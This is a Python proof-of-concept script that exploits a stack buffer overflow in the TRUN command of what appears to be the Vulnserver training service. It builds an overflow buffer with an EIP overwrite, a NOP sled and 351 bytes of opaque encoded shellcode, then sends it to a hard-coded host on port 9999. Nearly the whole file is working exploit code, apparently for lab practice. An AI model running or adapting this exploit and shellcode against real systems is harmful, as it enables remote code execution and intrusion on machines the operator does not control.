shellFinal
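#!/usr/bin/python
"""
Stack-overflow proof of concept against a TCP service's ``TRUN`` command.

Request layout: ``TRUN .`` + 2006 filler bytes + 4-byte EIP overwrite +
16-byte NOP sled + shellcode + ``F`` filler, padded to 3000 bytes, then
``\\r\\n``.  Port 9999 and the ``TRUN`` verb match the commonly documented
Vulnserver exercise, but the offset (2006) and the return address are
target-specific: re-derive both against your own binary before reuse, and
only run this against systems you are authorised to test.

Runs under Python 2 and 3.  Every payload piece is a ``bytes`` literal so
the high (0x80+) bytes go on the wire verbatim; under Python 3 a ``str``
payload would either be rejected by ``send`` or UTF-8-encoded, which
silently shifts the EIP offset.  The shebang resolves to python3 on many
current systems, which is why the dual compatibility matters.
"""
import socket

server = '192.168.1.33'   # target host -- presumably a lab VM; set per engagement
sport = 9999              # target port

# Bytes of filler before the saved return address (the EIP offset).
prefix = b'A' * 2006
# Little-endian 0x625011af overwrites EIP.  Presumably a JMP ESP gadget in a
# non-rebased module (it is the widely documented essfunc.dll address for
# Vulnserver) -- confirm against the modules loaded in the target process.
eip = b'\xaf\x11\x50\x62'
# Short NOP sled so a slightly-off ESP still lands in the shellcode.
nopsled = b'\x90' * 16
# Opaque encoded shellcode, 351 bytes.  The leading fnstenv-based GetPC stub
# (\xd9\x74\x24\xf4) looks like msfvenom's shikata_ga_nai encoder, but the
# payload type, LHOST/LPORT and bad-character set cannot be recovered from
# the bytes -- regenerate for your own listener rather than reusing these.
exploit = (
    b"\xba\x1f\xa9\x2f\xbb\xda\xcd\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
    b"\x52\x83\xee\xfc\x31\x56\x0e\x03\x49\xa7\xcd\x4e\x89\x5f\x93"
    b"\xb1\x71\xa0\xf4\x38\x94\x91\x34\x5e\xdd\x82\x84\x14\xb3\x2e"
    b"\x6e\x78\x27\xa4\x02\x55\x48\x0d\xa8\x83\x67\x8e\x81\xf0\xe6"
    b"\x0c\xd8\x24\xc8\x2d\x13\x39\x09\x69\x4e\xb0\x5b\x22\x04\x67"
    b"\x4b\x47\x50\xb4\xe0\x1b\x74\xbc\x15\xeb\x77\xed\x88\x67\x2e"
    b"\x2d\x2b\xab\x5a\x64\x33\xa8\x67\x3e\xc8\x1a\x13\xc1\x18\x53"
    b"\xdc\x6e\x65\x5b\x2f\x6e\xa2\x5c\xd0\x05\xda\x9e\x6d\x1e\x19"
    b"\xdc\xa9\xab\xb9\x46\x39\x0b\x65\x76\xee\xca\xee\x74\x5b\x98"
    b"\xa8\x98\x5a\x4d\xc3\xa5\xd7\x70\x03\x2c\xa3\x56\x87\x74\x77"
    b"\xf6\x9e\xd0\xd6\x07\xc0\xba\x87\xad\x8b\x57\xd3\xdf\xd6\x3f"
    b"\x10\xd2\xe8\xbf\x3e\x65\x9b\x8d\xe1\xdd\x33\xbe\x6a\xf8\xc4"
    b"\xc1\x40\xbc\x5a\x3c\x6b\xbd\x73\xfb\x3f\xed\xeb\x2a\x40\x66"
    b"\xeb\xd3\x95\x29\xbb\x7b\x46\x8a\x6b\x3c\x36\x62\x61\xb3\x69"
    b"\x92\x8a\x19\x02\x39\x71\xca\xed\x16\x78\x11\x86\x64\x7a\x24"
    b"\xed\xe0\x9c\x4c\x01\xa5\x37\xf9\xb8\xec\xc3\x98\x45\x3b\xae"
    b"\x9b\xce\xc8\x4f\x55\x27\xa4\x43\x02\xc7\xf3\x39\x85\xd8\x29"
    b"\x55\x49\x4a\xb6\xa5\x04\x77\x61\xf2\x41\x49\x78\x96\x7f\xf0"
    b"\xd2\x84\x7d\x64\x1c\x0c\x5a\x55\xa3\x8d\x2f\xe1\x87\x9d\xe9"
    b"\xea\x83\xc9\xa5\xbc\x5d\xa7\x03\x17\x2c\x11\xda\xc4\xe6\xf5"
    b"\x9b\x26\x39\x83\xa3\x62\xcf\x6b\x15\xdb\x96\x94\x9a\x8b\x1e"
    b"\xed\xc6\x2b\xe0\x24\x43\x4b\x03\xec\xbe\xe4\x9a\x65\x03\x69"
    b"\x1d\x50\x40\x94\x9e\x50\x39\x63\xbe\x11\x3c\x2f\x78\xca\x4c"
    b"\x20\xed\xec\xe3\x41\x24"
)


def build_attack(prefix=prefix, eip=eip, nopsled=nopsled, exploit=exploit,
                 total=3000):
    """Return the overflow buffer ``prefix + eip + nopsled + exploit`` + filler.

    The buffer is padded with ``b'F'`` up to ``total`` bytes.  If the pieces
    already exceed ``total`` no padding is added and the result is longer
    than ``total`` (same as the original ``'F' * negative`` behaviour).
    Padding is computed from the actual piece lengths, so changing the offset
    or sled size keeps the total consistent.
    """
    body = prefix + eip + nopsled + exploit
    padding = b'F' * max(0, total - len(body))
    return body + padding


# Kept at module level for anyone who imports this file to inspect the buffer.
attack = build_attack()


def main(server=server, sport=sport, timeout=None, payload=None):
    """Connect to ``server:sport``, send ``TRUN .`` + payload, then ``EXIT``.

    ``payload`` defaults to the module-level ``attack`` buffer.  ``timeout``
    (seconds) bounds every blocking socket call; ``None`` keeps the original
    fully blocking behaviour.  Raises ``socket.error`` (``OSError`` on
    Python 3) if the service resets the connection after the overflow --
    expected when the payload crashes the process instead of executing.
    The socket is always closed, even on error.
    """
    if payload is None:
        payload = attack
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.settimeout(timeout)
        s.connect((server, sport))
        print(s.recv(1024))   # service banner
        print("Sending attack to TRUN . with length %d" % len(payload))
        # sendall, not send: send() may transmit only part of a ~3 KB buffer
        # and the original ignored its return value.
        s.sendall(b'TRUN .' + payload + b'\r\n')
        print(s.recv(1024))
        s.sendall(b'EXIT\r\n')
        print(s.recv(1024))
    finally:
        s.close()


if __name__ == '__main__':
    main()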